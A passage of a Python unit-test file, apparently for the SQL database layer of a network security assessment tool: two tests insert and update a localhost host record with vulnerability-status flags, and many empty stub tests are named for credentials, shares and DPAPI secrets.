inserted_host = db.get_hosts()\n assert len(inserted_host) == 1\n host = inserted_host[0]\n assert host.id == 1\n assert host.ip == \"127.0.0.1\"\n assert host.hostname == \"localhost\"\n assert host.os == \"Windows Testing 2023\"\n assert host.smbv1 is False\n assert host.signing is True\n assert host.spooler is True\n assert host.zerologon is True\n assert host.petitpotam is False\n assert host.dc is False\n\n\ndef test_update_host(db, sess):\n host = {\n \"ip\": \"127.0.0.1\",\n \"hostname\": \"localhost\",\n \"domain\": \"TEST.DEV\",\n \"os\": \"Windows Testing 2023\",\n \"smbv1\": True,\n \"signing\": False,\n \"spooler\": True,\n \"zerologon\": False,\n \"petitpotam\": False,\n \"dc\": False,\n }\n iq = Insert(db.HostsTable)\n sess.execute(iq, [host])\n db.add_host(\n \"127.0.0.1\",\n \"localhost\",\n \"TEST.DEV\",\n \"Windows Testing 2023 Updated\",\n False,\n True,\n False,\n False,\n False,\n False,\n )\n inserted_host = db.get_hosts()\n assert len(inserted_host) == 1\n host = inserted_host[0]\n assert host.id == 1\n assert host.ip == \"127.0.0.1\"\n assert host.hostname == \"localhost\"\n assert host.os == \"Windows Testing 2023 Updated\"\n assert host.smbv1 is False\n assert host.signing is True\n assert host.spooler is False\n assert host.zerologon is False\n assert host.petitpotam is False\n assert host.dc is False\n\n\ndef test_add_credential():\n pass\n\n\ndef test_update_credential():\n pass\n\n\ndef test_remove_credential():\n pass\n\n\ndef test_add_admin_user():\n pass\n\n\ndef test_get_admin_relations():\n pass\n\n\ndef test_remove_admin_relation():\n pass\n\n\ndef test_is_credential_valid():\n pass\n\n\ndef test_get_credentials():\n pass\n\n\ndef test_get_credential():\n pass\n\n\ndef test_is_credential_local():\n pass\n\n\ndef test_is_host_valid():\n pass\n\n\ndef test_get_hosts():\n pass\n\n\ndef test_is_group_valid():\n pass\n\n\ndef test_add_group():\n pass\n\n\ndef test_get_groups():\n pass\n\n\ndef test_get_group_relations():\n pass\n\n\ndef test_remove_group_relations():\n pass\n\n\ndef test_is_user_valid():\n pass\n\n\ndef test_get_users():\n pass\n\n\ndef test_get_user():\n pass\n\n\ndef test_get_domain_controllers():\n pass\n\n\ndef test_is_share_valid():\n pass\n\n\ndef test_add_share():\n pass\n\n\ndef test_get_shares():\n pass\n\n\ndef test_get_shares_by_access():\n pass\n\n\ndef test_get_users_with_share_access():\n pass\n\n\ndef test_add_domain_backupkey():\n pass\n\n\ndef test_get_domain_backupkey():\n pass\n\n\ndef test_is_dpapi_secret_valid():\n pass\n\n\ndef test_add_dpapi_secrets():\n pass\n\n\ndef test_get_dpapi_secrets():\n pass\n\n\ndef test_add_loggedin_relation():\n pass\n\n\ndef test_get_loggedin_relations():\n pass\n\n\ndef test_remove_loggedin_relations():\n pass\n" } ]